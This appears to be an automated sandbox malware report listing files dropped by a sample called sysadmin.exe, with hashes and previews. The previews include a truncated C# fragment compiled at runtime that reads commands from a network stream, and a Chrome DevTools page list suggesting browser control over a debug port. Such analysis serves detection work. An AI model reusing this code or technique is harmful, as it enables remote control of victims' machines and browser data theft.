                                                                                                                                                                                                                                                          Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\w47qq9

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\ProgramData\3wtj5\x4eukn

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):294912
                                                                                                                                                                                                                                                          Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                                                                          MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                                                                          SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                                                                          SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
                                                                                                                                                                                                                                                          SHA-512:DCDD722C3A8AD79265616ADDDCA208E068E4ECEBE8820E4ED16B1D1E07FD52EB3A59A22988450071CFDA50BBFF7CB005ADF05A843DA38421F28572F3433C0F19
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sysadmin.exe.log

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\sysadmin.exe
                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1281
                                                                                                                                                                                                                                                          Entropy (8bit):5.370111951859942
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                                                                                                                                                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                                                                                                                                                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                                                                                                                                                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                                                                                                                                                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                          Entropy (8bit):5.385534252508304
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCdTECyfNaoCRENEYCRELfNaoCSX/XSCSXKfNaoCSXM0UrU0U8CE:6NnCdTECaNnCRMnCR6NnC5CzNnC50UrJ
                                                                                                                                                                                                                                                          MD5:8355CE039B2C18F39F045EE5E3CEF4BF
                                                                                                                                                                                                                                                          SHA1:453006F05B7743EDFD18CB6F35C3BE2ED1B74D02
                                                                                                                                                                                                                                                          SHA-256:E50CC8399A8F17416B3113C0D0CFA1A678DFBF433510E5C4E3209197E79E65D4
                                                                                                                                                                                                                                                          SHA-512:9E5764C8AA32AE3BB2FF3A7574D0F75092598FCDE8905D9B840666C1774B5346C104F21C29DF231C183A482FAB3D2D6B9E5049E39221D9ADFCFE4AAAC55181A2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0F64BCA9989FAE6365712FCF5F24C2D7",.. "id": "0F64BCA9989FAE6365712FCF5F24C2D7",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0F64BCA9989FAE6365712FCF5F24C2D7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/03184175BCF07115A8D624EF7F44EDB3",.. "id": "03184175BCF07115A8D624EF7F44EDB3",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/03184175BCF07115A8D624EF7F44EDB3"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES8D13.tmp

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Mon Jan 13 21:09:25 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1332
                                                                                                                                                                                                                                                          Entropy (8bit):3.9944620166628027
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:HsFzW9nZfCIaEVDfHd/wKEsmNwI+ycuZhN4akS0PNnqS2d:/BCwp9IKhmm1ul4a3UqSG
                                                                                                                                                                                                                                                          MD5:7B0E8E385B70CCF56E02400498E80E45
                                                                                                                                                                                                                                                          SHA1:6F59B5408D43E43E53E4C481F2B9C1453993EB25
                                                                                                                                                                                                                                                          SHA-256:13DD1D021D2B90E5C66E622731DEBBD34D84C2B0ADA673AD2DBFE3B07FBC3008
                                                                                                                                                                                                                                                          SHA-512:43952E33D7306976E2D01A5F9AD7725839D703A80A4823413F87918E8094079F3868852D76462F1D824DD4A76F4F05E3CFC7493236FAC2A0C8F77C2C11DE7B3A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:L......g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\jhtixtpk\CSCCDB7263B207A4F1CADFD2FC19D91DBC.TMP..................H..u:....+..Q...........4.......C:\Users\user\AppData\Local\Temp\RES8D13.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.h.t.i.x.t.p.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\jhtixtpk\CSCCDB7263B207A4F1CADFD2FC19D91DBC.TMP

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):652
                                                                                                                                                                                                                                                          Entropy (8bit):3.1063263237612535
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryXnGak7Ynqq8nXPN5Dlq5J:+RI+ycuZhN4akS0PNnqX
                                                                                                                                                                                                                                                          MD5:841A48D20C753AD8FF0FF12BA10551B4
                                                                                                                                                                                                                                                          SHA1:93C246728CC0016BEF664338F3E428531A65F9A9
                                                                                                                                                                                                                                                          SHA-256:6456CF248E9E0FE9DBC0A5AB697FFEBE6565B4B2C4252139FF1181DF5B7D9CF5
                                                                                                                                                                                                                                                          SHA-512:57D0EA04365AB07B2AEC35BB7CDDAF5EADEFEDAC0A6FDA08C20862404E48E06410F1209E337C140CDD1E64E5D583A3587370B95AD650C305C8E0BE160B035FC7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.h.t.i.x.t.p.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.h.t.i.x.t.p.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.0.cs

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\sysadmin.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2060
                                                                                                                                                                                                                                                          Entropy (8bit):4.765306088085889
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:JolweNHRn/fRvRf7ya0CvRil7MRxvRV7IkKDLZRCvRo2B:Jol1NjZGa0C4O0kQd2B
                                                                                                                                                                                                                                                          MD5:C0D817B5D15C6E1991C9569BA4E69517
                                                                                                                                                                                                                                                          SHA1:A5703E25E0F2FFA5F8F7E02F0FE61487FB2EDA77
                                                                                                                                                                                                                                                          SHA-256:6462F4C593D443479825C0CEFB9B71D69ED05081004CE168D7FC29BBF4442DB3
                                                                                                                                                                                                                                                          SHA-512:8928408A17520EB4C16C2FF4C55476E853D02093A555D5D781A63B5C27A29AF5375B0D74310B257208FC3E5BB65AB697A3E41E3C538FFD86BD584BA6909F4D6B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.using System;..using System.Net.Sockets;..using System.Reflection;..using System.Text;....public class PacketRead..{.. public static void ReadPacket(NetworkStream stream).. {.. string fileName = @"Files\File12.exe";.... byte[] fileNameBytes = Encoding.UTF8.GetBytes(fileName);.... stream.Write(fileNameBytes, 0, fileNameBytes.Length);.... byte[] buffer = new byte[1024];.... int read = stream.Read(buffer, 0, buffer.Length);.... string convert = Encoding.UTF8.GetString(buffer, 0, read);.... LogicStart.Command(convert, stream);.. }..}....public class PacketReadSize..{.. public static byte[] ReceiveData(NetworkStream stream).. {.. byte[] sizeBuffer = new byte[4];.. stream.Read(sizeBuffer, 0, 4);.. int dataSize = BitConverter.ToInt32(sizeBuffer, 0);.... byte[] dataBuffer = new byte[dataSize];.. int bytesRead = 0;.. while (bytesRead < dataSize).. {.. bytesRead += strea

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.cmdline

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\sysadmin.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):183
                                                                                                                                                                                                                                                          Entropy (8bit):4.991904671781886
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1Rt+kiE2J5xAI3MTkRDcRkLBHUiQCIFRVRMxTPIt+kiE2J5x/:pAu+H2Lnwkn23f3Mw6iqzxszIwkn23fx
                                                                                                                                                                                                                                                          MD5:435A6576642147CE9DD3CD9FFDC5CE27
                                                                                                                                                                                                                                                          SHA1:03B26DF8688B861E9C8AF45AA08B97B96BFF32C7
                                                                                                                                                                                                                                                          SHA-256:C056A1FB97C50C27305916A0A435AFD35FADD6C28CA545685B581CDBDB6E06B8
                                                                                                                                                                                                                                                          SHA-512:A9BC876A085C0688164F61E795BCD94D602BED0056AFD578AD05DD7FD88EBE354EABDCF34335E19EF4DCF539B273E3CF2B3ED521CD7B8CE29BBAFE84901C7A54
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.0.cs"

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.dll

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4608
                                                                                                                                                                                                                                                          Entropy (8bit):3.377573341552431
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:6HaQ2ESMl6PxttCDsJyHX3fr3lx1ul4a3Uq:qlt4ptWFHX3fr3lqmK
                                                                                                                                                                                                                                                          MD5:292F00F47D62DB56498388BE2C1548E0
                                                                                                                                                                                                                                                          SHA1:E12267F4B4BE4DEE14BFA9F90C6FD2522A413EEB
                                                                                                                                                                                                                                                          SHA-256:A5B133A10FD0C6A5A40B928C2EEA9D995E4F8EF74E7330D0BD205E340990D955
                                                                                                                                                                                                                                                          SHA-512:197364A9407E4B2E6DDAA01DE9C49506AFF36C9B7C50EFF4CAD5B052C2482EF522BD1ED7127090A61460686ECB32D7C1DE967F3ADC38306B0A8757F39AC56152
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................(... ...@....... ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H........!...............................................................0..L.......r...p.(.....o..........io.... ...............io.....(.......o.........(....*..(....*.0..8..................o....&..(..............+.......Yo....X...2..*..(....*.0..%.........o.......o...................o....&*..(....*....0..:........%.,4.r#..p(....-.*.(......(......(......r9..prC..p.(....*..(....*..(....*..(....*..BSJB............v4.0.30319......l...X...#~......,...#Strings........P...#US.@...

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.out

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\sysadmin.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                          Size (bytes):683
                                                                                                                                                                                                                                                          Entropy (8bit):5.230359707586374
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:KJN/IR37LwfzxqQfzxPuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBIdYfPfJuKax5DqBVKVrdFAMBJTH
                                                                                                                                                                                                                                                          MD5:D8021A25F5AB2E4E5998D7E27C2237E8
                                                                                                                                                                                                                                                          SHA1:D0A2B21E5CB275A48BB02376CE45E050921061DB
                                                                                                                                                                                                                                                          SHA-256:92973AD9587AE3FC5EBE59F30924A748731B7CDF96C2B8B5427995428C321416
                                                                                                                                                                                                                                                          SHA-512:C54214DDFC3C63891AD5B2CC5FD749CAF0A82C3B3D67FD2E40AC2856E8D6AAE431CE702762C8663E2F2B15F5C3A7A998A5683BD69B1E85C242A02F7006CAC444
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\jhtixtpk\jhtixtpk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                                                                                                                                                                          Chrome Cache Entry: 79

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (841)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):846
                                                                                                                                                                                                                                                          Entropy (8bit):5.166205792470767
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:q7HBGItAciBHslgT9lCuABATFuoB7HHHHHHHYqmffffffo:q7H7t8KlgZ01BAJuSEqmffffffo
                                                                                                                                                                                                                                                          MD5:0BCFAA57522B6B14611AEE61EEB948A0
                                                                                                                                                                                                                                                          SHA1:11CA8ACEE3D35DF19891D62802D5F767F5E67730
                                                                                                                                                                                                                                                          SHA-256:86BEDA06BC0CABFB4B11B8A8428B021746A01ABECDF788969113FB14BD8116AA
                                                                                                                                                                                                                                                          SHA-512:1B3942CE5E6D35EF70609ABBAF43832D1296D3E92A72508471AB7B3FD204A92F25AD71F5E0AF5189F9C5F65EA4D9D3A0B4B863BB7D67E461B0EB56239D66E4E2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                          Preview:)]}'.["",["jpmorgan chase bank","us retiree malaysia mm2h visa","nba trade rumors","zodiac signs daily horoscope today","nosferatu 2024 streaming","samsung galaxy s25 ultra release date","winter storm snowfall forecast","lane johnson vs penei sewell"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"8093286182665372933","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

                                                                                                                                                                                                                                                          Chrome Cache Entry: 80

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):176106
                                                                                                                                                                                                                                                          Entropy (8bit):5.550039490877255
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3072:eEBOdc32TMLUtSdEsN4FP5/278Ivoh9NmxVhTaLB80G5JCk2mlNwfQuJq+CjQDI/:eKOdcPLUtSdn4P5/y8Iwh9NmX5aLB80o
                                                                                                                                                                                                                                                          MD5:D64C0D9594ACD5B48E6C6A4A48494A2C
                                                                                                                                                                                                                                                          SHA1:F39C02870860A3F0563B47D753699E8095578DFE
                                                                                                                                                                                                                                                          SHA-256:A2E707230996D82F27A3EC406290353D4DF89A967693D454A57E14896509D87B
                                                                                                                                                                                                                                                          SHA-512:F6DA048855D3B2D05F0A11E90206209FF991EEEA1926A298B17D1DE48E85E1E2334CF7885C772AB109FCC372FB5B6DA8A328AC901653C87CDAFC3B0A9607D3C4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvH0Rknr6hXqx-tgqAUuIv05wLZhQ"
                                                                                                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj||(_.bj=new cj)).set(a,b);(_.dj||(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.xb(a,b,c);return Array.isArray(a)?a:_.Hc};._.jj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a|1};_.lj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.mj=function(a,b,c){32&b&&c||(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

